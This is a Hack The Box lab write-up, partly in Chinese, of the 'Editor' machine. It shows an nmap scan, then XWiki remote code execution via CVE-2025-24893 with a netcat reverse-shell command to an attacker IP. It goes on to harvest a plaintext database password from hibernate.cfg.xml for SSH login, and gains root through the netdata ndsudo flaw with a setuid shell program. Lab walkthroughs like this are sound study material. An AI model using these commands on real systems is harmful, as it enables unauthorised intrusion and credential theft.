HTB-Editor

Box Info
#

OS	Difficulty
Linux	Easy

Nmap
#

[root@Hacking] /home/kali/Editor  
❯ nmap editor.htb -A                                                                       

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_  256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
80/tcp   open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Editor - SimplistCode Pro
8080/tcp open  http    Jetty 10.0.20
| http-title: XWiki - Main - Intro
|_Requested resource was http://editor.htb:8080/xwiki/bin/view/Main/
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Jetty(10.0.20)
| http-cookie-flags: 
|   /: 
|     JSESSIONID: 
|_      httponly flag not set
| http-methods: 
|_  Potentially risky methods: PROPFIND LOCK UNLOCK
| http-webdav-scan: 
|   Allowed Methods: OPTIONS, GET, HEAD, PROPFIND, LOCK, UNLOCK
|   WebDAV type: Unknown
|_  Server Type: Jetty(10.0.20)
| http-robots.txt: 50 disallowed entries (15 shown)
| /xwiki/bin/viewattachrev/ /xwiki/bin/viewrev/ 
| /xwiki/bin/pdf/ /xwiki/bin/edit/ /xwiki/bin/create/ 
| /xwiki/bin/inline/ /xwiki/bin/preview/ /xwiki/bin/save/ 
| /xwiki/bin/saveandcontinue/ /xwiki/bin/rollback/ /xwiki/bin/deleteversions/ 
| /xwiki/bin/cancel/ /xwiki/bin/delete/ /xwiki/bin/deletespace/ 
|_/xwiki/bin/undelete/

CVE-2025-24893
#

进入8080端口，发现底部版本信息

搜索到这个脚本

gunzf0x/CVE-2025-24893: PoC for CVE-2025-24893: XWiki’ Remote Code Execution exploit for versions prior to 15.10.11, 16.4.1 and 16.5.0RC1.

可以直接使用脚本获取到反弹shell

python CVE-2024-24893.py -t http://editor.htb:8080/ -c 'busybox nc 10.10.16.31 4444 -e /bin/bash'

参考文档：Configuration (XWiki.org)

在hibernate.cfg.xml中发现密码字段

xwiki@editor:/usr/lib/xwiki/WEB-INF$ cat hibernate.cfg.xml  |grep password
    <property name="hibernate.connection.password">theEd1t0rTeam99</property>
    <property name="hibernate.connection.password">xwiki</property>
    <property name="hibernate.connection.password">xwiki</property>
    <property name="hibernate.connection.password"></property>
    <property name="hibernate.connection.password">xwiki</property>
    <property name="hibernate.connection.password">xwiki</property>
    <property name="hibernate.connection.password"></property>
xwiki@editor:/usr/lib/xwiki/WEB-INF$

其中，可以使用theEd1t0rTeam99密码登录到oliver用户

Root
#

查找特殊权限的文件，发现一个可疑的ndsudo

经过搜索找到这个poc：AzureADTrent/CVE-2024-32019-POC: POC for netdata ndsudo vulnerability - CVE-2024-32019

由于目标机器上没有gcc，这里需要本地编译传上去

[root@Hacking] /home/kali/Editor  
❯ cat poc.c                                                
#include <unistd.h>

int main() {
    setuid(0); setgid(0);
    execl("/bin/bash", "bash", NULL);
    return 0;
}

[root@Hacking] /home/kali/Editor  
❯ gcc poc.c -o nvme

[root@Hacking] /home/kali/Editor  
❯ scp nvme oliver@editor.htb:/tmp/
oliver@editor.htb's password: 
nvme                                                                                                          100%   16KB  64.2KB/s   00:00

拿到root权限

Reply by Email

Box Info #

Nmap #

CVE-2025-24893 #

Root #

Box Info
#

Nmap
#

CVE-2025-24893
#

Root
#